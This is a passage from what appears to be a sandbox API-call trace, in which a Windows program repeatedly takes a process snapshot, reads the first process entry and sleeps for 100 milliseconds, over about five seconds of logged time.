hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.016] Sleep (dwMilliseconds=0x64) [0173.130] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0173.143] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.250] Sleep (dwMilliseconds=0x64) [0173.257] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0173.266] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.331] Sleep (dwMilliseconds=0x64) [0173.348] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0173.359] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.408] Sleep (dwMilliseconds=0x64) [0173.427] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0173.435] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.484] Sleep (dwMilliseconds=0x64) [0173.488] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0173.497] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.547] Sleep (dwMilliseconds=0x64) [0173.554] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0173.568] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.617] Sleep (dwMilliseconds=0x64) [0173.629] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0173.637] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.687] Sleep (dwMilliseconds=0x64) [0173.691] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0173.701] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.756] Sleep (dwMilliseconds=0x64) [0173.770] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0173.781] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.883] Sleep (dwMilliseconds=0x64) [0173.895] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0173.905] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.961] Sleep (dwMilliseconds=0x64) [0173.973] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0173.982] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.039] Sleep (dwMilliseconds=0x64) [0174.072] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0174.085] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.158] Sleep (dwMilliseconds=0x64) [0174.198] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0174.216] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.298] Sleep (dwMilliseconds=0x64) [0174.301] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0174.313] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.379] Sleep (dwMilliseconds=0x64) [0174.395] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0174.407] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.483] Sleep (dwMilliseconds=0x64) [0174.489] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0174.502] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.578] Sleep (dwMilliseconds=0x64) [0174.582] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0174.590] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.640] Sleep (dwMilliseconds=0x64) [0174.646] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0174.657] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.706] Sleep (dwMilliseconds=0x64) [0174.723] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0174.733] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.779] Sleep (dwMilliseconds=0x64) [0174.797] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0174.809] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.860] Sleep (dwMilliseconds=0x64) [0174.863] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0174.872] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.918] Sleep (dwMilliseconds=0x64) [0174.928] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0174.938] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.991] Sleep (dwMilliseconds=0x64) [0175.004] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0175.013] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.093] Sleep (dwMilliseconds=0x64) [0175.099] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0175.110] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.218] Sleep (dwMilliseconds=0x64) [0175.223] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0175.232] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.282] Sleep (dwMilliseconds=0x64) [0175.287] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0175.297] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.355] Sleep (dwMilliseconds=0x64) [0175.364] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0175.373] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.420] Sleep (dwMilliseconds=0x64) [0175.427] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0175.436] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.486] Sleep (dwMilliseconds=0x64) [0175.488] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0175.499] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.555] Sleep (dwMilliseconds=0x64) [0175.567] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0175.578] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.637] Sleep (dwMilliseconds=0x64) [0175.644] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0175.655] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.708] Sleep (dwMilliseconds=0x64) [0175.723] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0175.735] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.805] Sleep (dwMilliseconds=0x64) [0175.818] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0175.832] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.900] Sleep (dwMilliseconds=0x64) [0175.910] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0175.924] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.993] Sleep (dwMilliseconds=0x64) [0176.005] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0176.018] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.090] Sleep (dwMilliseconds=0x64) [0176.098] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0176.108] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.254] Sleep (dwMilliseconds=0x64) [0176.270] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0176.283] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.338] Sleep (dwMilliseconds=0x64) [0176.348] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0176.360] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.412] Sleep (dwMilliseconds=0x64) [0176.428] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0176.438] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.493] Sleep (dwMilliseconds=0x64) [0176.505] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0176.516] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.570] Sleep (dwMilliseconds=0x64) [0176.585] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0176.597] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.650] Sleep (dwMilliseconds=0x64) [0176.661] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0176.674] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.735] Sleep (dwMilliseconds=0x64) [0176.739] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0176.751] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.823] Sleep (dwMilliseconds=0x64) [0176.833] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0176.846] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.913] Sleep (dwMilliseconds=0x64) [0176.928] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0176.940] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.025] Sleep (dwMilliseconds=0x64) [0177.036] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0177.047] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.106] Sleep (dwMilliseconds=0x64) [0177.117] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0177.129] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.226] Sleep (dwMilliseconds=0x64) [0177.238] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0177.247] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.305] Sleep (dwMilliseconds=0x64) [0177.317] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0177.331] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.378] Sleep (dwMilliseconds=0x64) [0177.395] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0177.404] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.451] Sleep (dwMilliseconds=0x64) [0177.459] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0177.467] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.513] Sleep (dwMilliseconds=0x64) [0177.520] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0177.528] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.572] Sleep (dwMilliseconds=0x64) [0177.582] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0177.592] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.635] Sleep (dwMilliseconds=0x64) [0177.644] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0177.653] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.695] Sleep (dwMilliseconds=0x64) [0177.708] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0177.716] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.801] Sleep (dwMilliseconds=0x64) [0177.826] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0177.837] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.884] Sleep (dwMilliseconds=0x64) [0177.906] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0177.915] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.979] Sleep (dwMilliseconds=0x64) [0177.986] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0177.996] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.043] Sleep (dwMilliseconds=0x64) [0178.048] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0178.063] Process32First (in: 